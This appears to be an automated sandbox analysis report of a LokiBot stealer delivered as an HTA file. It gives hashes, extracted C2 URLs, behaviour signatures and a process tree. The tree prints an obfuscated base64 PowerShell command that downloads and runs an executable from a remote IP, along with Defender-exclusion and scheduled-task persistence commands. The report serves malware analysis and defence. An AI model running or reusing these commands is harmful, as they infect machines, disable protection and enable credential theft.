Overview

overview

10

Static

static

1

seemybestb...be.hta

windows7-x64

10

seemybestb...be.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 18:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta

  • Size

    178KB

  • MD5

    51ff32b18625da8e57f2b01773842cfe

  • SHA1

    5a67dd2a7f6e75324129678af99b09936bc5e2e9

  • SHA256

    b32a47004e6134879604cb3246c89b351bc5fb2547b1d87070846c5719951727

  • SHA512

    6ae49faacd42c43f288560d3cc77929e7b5465a522bdff6838df5d8f7ebc9228091e2279e9e63c008456e3c467033188a0e68234a38e8016c994b3c5eb1c8d6a

  • SSDEEP

    96:4vCl17nf2iLZ62iLqG4SPwYNf6hzhs2iL0Y5Q:4vCldnf2iLZ62iLISWs2iL0Y5Q

Score
10/10
lokibotcollectiondefense_evasiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Lokibot family
    lokibot
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
    defense_evasionexecution
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\SysWOW64\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE
      "C:\Windows\SysTEm32\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE" "PoWErShELl.EXe -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt ; iNvoke-eXPrEssion($(iNvoKe-ExprESsiOn('[syStEm.TExT.eNCOdING]'+[cHAR]58+[CHar]58+'Utf8.gEtsTrING([SySTeM.CoNVERt]'+[char]58+[Char]58+'fromBAse64StrIng('+[char]34+'JEtQeWw1UEl4REFxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlUmRlRklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVwR2NKekppUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdtRWZCcVZKd2IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT2hlbmlXY0dJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWNLZGFobmZjYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1dTdUFVSGV4bSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkS1B5bDVQSXhEQXE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzM2L2Nhc3BvbC5leGUiLCIkZW5WOkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzdGFSVC1TbGVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHAr]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2124
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2780
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bujsktwr.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8566.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8565.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2676
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2276
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:348
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\bdWEysRwjYwmy.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1424
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bdWEysRwjYwmy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF2D.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3052
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8566.tmp
    Filesize

    1KB

    MD5

    d7125d1a7a1caece5dd5a215c313aa99

    SHA1

    440f81d26dfa9eb4630fe7794af69257b83c8642

    SHA256

    c5a3110c11cf7478c79f9224781d099bf4a848945bc46f04c030baed287e204a

    SHA512

    5a62f5a8be24d19a3c24a04070d4ec26455c3983db2ea02cf94dee252c9d6908a05b393f1788a0361a7303d53d173a46c78d786b915173bd54fbd30359e7f839

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\bujsktwr.dll
    Filesize

    3KB

    MD5

    86b7cfe87bbbc940bdc5e9cb6e046287

    SHA1

    8ef44b7518558c91f7f3374f0f730fb0e8c5e599

    SHA256

    2244ff0dce9384a79710db046114b262feb00b44604f3732ca0f6134564563fc

    SHA512

    e2d4f348e4ef3fd5714947ec9f5877537f18644c4fe9de78c0d0a6a06b50ca93531419893cdad5bbac1edfccd07b5651b1805ddc44dc3de90cf1921e21d10549

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\bujsktwr.pdb
    Filesize

    7KB

    MD5

    71c88824a44a1d7989ae149c37eb1226

    SHA1

    309eba7dd9c30ebf1b13d05aa2fb284c636324c9

    SHA256

    52f69b02ae63d87a3074eac3e8de0deb1a33df44a4cbc76e9f899c2486ee8005

    SHA512

    ba2bf5923deb47d5883bd6f0456042f27b1f24d81c7ede1d3f28cef007ed6829bb03e955d322fa49b919716698eac749c6b2dc3b041a3b28a0b1aa45c800efe6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpF2D.tmp
    Filesize

    1KB

    MD5

    de0c70fa04fe31fe87d9e2d26a30d031

    SHA1

    c6a81514ed6db7f9c5fd4eeefcfd6dfb2ac2c52e

    SHA256

    345ce3c2aff6a1d9c5b51abc145c55960a9487024c080d8d61a9d8694c4fac43

    SHA512

    adb022384852d430bdbcfd1183200f21744e37eff0945b332be1360bcfc7b6b4a9cf47a5b50ca4ffb43b146bd68b530b91dd5bd9979a3a0d54ad883f499b8154

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1a805c2d7f035039c112f2c2b38cb952

    SHA1

    6df9fe930bb71547474faa08031d7a8dc9405cbd

    SHA256

    bda216da846ff677042f40edb88fc994c8990022b1d20f0309c08e86bf70711c

    SHA512

    13e0560b25167e975c382de44fa8413c52a42d15e75ffc14918b6b899a73281178511a1ee24a4f19c00e52f0f5f1f8d34650ffdcd07619385ef8010d11f4e130

    Download Submit

  • C:\Users\Admin\AppData\Roaming\caspol.exe
    Filesize

    497KB

    MD5

    8c34e99269d4121a0dfe4c3eaa9e269f

    SHA1

    5bbaa7dc726324e057eb4f78856c368488c4805a

    SHA256

    2899cb71414f7d46a6be0d40a5ba017d407a41f291154ea6a86f421754d11a76

    SHA512

    99f3cc287b9437ee888371fac3cf37d77d39c9468086feb0c80f4a0a4cc8a750c0b2798ec32a90aea3c88ed67c36005bcfd81d8e439edcdaca9e60caa1f3f277

    Download Submit

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8565.tmp
    Filesize

    652B

    MD5

    a85c8be9807b5606f75d0eaf2856ce33

    SHA1

    7bca1ae19f6d6895d7960f691dfc0454c43b419a

    SHA256

    b051969f7981dc86e020c491af9d383951cbedf7d4fc3ab21ef17be9113d98aa

    SHA512

    93ecdb7476f401fccc0c13cc3c811c1a82c9c83b8053bf1cd62615993aeac25f57cfb9dc9f67d0d6df5b8d8111538e0268cf824fe54599750db830a38f63c631

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\bujsktwr.0.cs
    Filesize

    487B

    MD5

    ee60617752b2061187e3773f962ff810

    SHA1

    5d3dc400820671b51499e9003fcbd7794d07e315

    SHA256

    69736289404f9f61bb67a99a24945aaa347591458b09f4dd686bbc58d8b25ce9

    SHA512

    5bf701c77b31bcf3421fa2cc4649127b54656175bdfb238ddca8606063ceec69fd76d2f611b5f55f246a3003d3fd76b1b318fa0fc4cb1b10d9b8b04e153bf231

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\bujsktwr.cmdline
    Filesize

    309B

    MD5

    66b5f784261e649a0432bc59d4f09fe9

    SHA1

    d476fb824a48e572260ea23e37e3bd6e1e163e0b

    SHA256

    db699025023afc388cef3a26a4d7850df4d74be7a7a72043cfd31d22fb83128e

    SHA512

    96287cb3afcc268cd783bd4993062211a5e631166a299806628039b99ef483a22db840e17edf358e1b16d54437aa278b9d11f3595f3a5833abeb4f9c92d97015

    Download Submit

  • memory/2276-46-0x0000000004590000-0x00000000045F4000-memory.dmp

    Filesize

    400KB

    Download

  • memory/2276-45-0x0000000000270000-0x0000000000282000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2276-44-0x0000000000C60000-0x0000000000CE2000-memory.dmp

    Filesize

    520KB

    Download

  • memory/2304-63-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2304-65-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2304-67-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2304-71-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2304-73-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2304-76-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2304-74-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2304-69-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download